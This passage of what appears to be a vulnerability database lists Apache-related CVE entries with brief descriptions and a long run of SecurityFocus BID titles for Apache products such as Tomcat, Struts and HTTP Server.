6673| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
6674| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
6675| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
6676| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
6677| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
6678| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
6679| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
6680| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
6681| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
6682| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
6683| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
6684| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
6685| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
6686| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
6687| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
6688| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
6689|
6690| SecurityFocus - https://www.securityfocus.com/bid/:
6691| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
6692| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
6693| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
6694| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
6695| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
6696| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
6697| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
6698| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
6699| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
6700| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
6701| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
6702| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
6703| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
6704| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
6705| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
6706| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
6707| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
6708| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
6709| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
6710| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
6711| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
6712| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
6713| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
6714| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
6715| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
6716| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
6717| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
6718| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
6719| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
6720| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
6721| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
6722| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
6723| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
6724| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
6725| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
6726| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
6727| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
6728| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
6729| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
6730| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
6731| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
6732| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
6733| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
6734| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
6735| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
6736| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
6737| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
6738| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
6739| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
6740| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
6741| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
6742| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
6743| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
6744| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
6745| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
6746| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
6747| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
6748| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
6749| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
6750| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
6751| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
6752| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
6753| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
6754| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
6755| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
6756| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
6757| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
6758| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
6759| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
6760| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
6761| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
6762| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
6763| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
6764| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
6765| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
6766| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
6767| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
6768| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
6769| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
6770| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
6771| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
6772| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
6773| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
6774| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
6775| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
6776| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
6777| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
6778| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
6779| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
6780| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
6781| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
6782| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
6783| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
6784| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
6785| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
6786| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
6787| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
6788| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
6789| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
6790| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
6791| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
6792| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
6793| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
6794| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
6795| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
6796| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
6797| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
6798| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
6799| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
6800| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
6801| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
6802| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
6803| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
6804| [100447] Apache2Triad Multiple Security Vulnerabilities
6805| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
6806| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
6807| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
6808| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
6809| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
6810| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
6811| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
6812| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
6813| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
6814| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
6815| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
6816| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
6817| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
6818| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
6819| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
6820| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
6821| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
6822| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
6823| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
6824| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
6825| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
6826| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
6827| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
6828| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
6829| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
6830| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
6831| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
6832| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
6833| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
6834| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
6835| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
6836| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
6837| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
6838| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
6839| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
6840| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
6841| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
6842| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
6843| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
6844| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
6845| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
6846| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
6847| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
6848| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
6849| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
6850| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
6851| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
6852| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
6853| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
6854| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
6855| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
6856| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
6857| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
6858| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
6859| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
6860| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
6861| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
6862| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
6863| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
6864| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
6865| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
6866| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
6867| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
6868| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
6869| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
6870| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
6871| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
6872| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
6873| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
6874| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
6875| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
6876| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
6877| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
6878| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
6879| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
6880| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
6881| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
6882| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
6883| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
6884| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
6885| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
6886| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
6887| [95675] Apache Struts Remote Code Execution Vulnerability
6888| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
6889| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
6890| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
6891| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
6892| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
6893| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
6894| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
6895| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
6896| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
6897| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
6898| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
6899| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
6900| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
6901| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
6902| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
6903| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
6904| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
6905| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
6906| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
6907| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
6908| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
6909| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
6910| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
6911| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
6912| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
6913| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
6914| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
6915| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
6916| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
6917| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
6918| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
6919| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
6920| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
6921| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
6922| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
6923| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
6924| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
6925| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
6926| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
6927| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
6928| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
6929| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
6930| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
6931| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
6932| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
6933| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
6934| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
6935| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
6936| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
6937| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
6938| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
6939| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
6940| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
6941| [91736] Apache XML-RPC Multiple Security Vulnerabilities
6942| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
6943| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
6944| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
6945| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
6946| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
6947| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
6948| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
6949| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
6950| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
6951| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
6952| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
6953| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
6954| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
6955| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
6956| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
6957| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
6958| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
6959| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
6960| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
6961| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
6962| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
6963| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
6964| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
6965| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
6966| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
6967| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
6968| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
6969| [90482] Apache CVE-2004-1387 Local Security Vulnerability
6970| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
6971| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
6972| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
6973| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
6974| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
6975| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
6976| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
6977| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
6978| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
6979| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
6980| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
6981| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
6982| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
6983| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
6984| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
6985| [86399] Apache CVE-2007-1743 Local Security Vulnerability
6986| [86397] Apache CVE-2007-1742 Local Security Vulnerability
6987| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
6988| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
6989| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
6990| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
6991| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
6992| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
6993| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
6994| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
6995| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
6996| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
6997| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
6998| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
6999| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
7000| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
7001| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
7002| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
7003| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
7004| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
7005| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
7006| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
7007| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
7008| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
7009| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
7010| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
7011| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
7012| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
7013| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
7014| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
7015| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
7016| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
7017| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
7018| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
7019| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
7020| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
7021| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
7022| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
7023| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
7024| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
7025| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
7026| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
7027| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
7028| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
7029| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
7030| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
7031| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
7032| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
7033| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
7034| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
7035| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
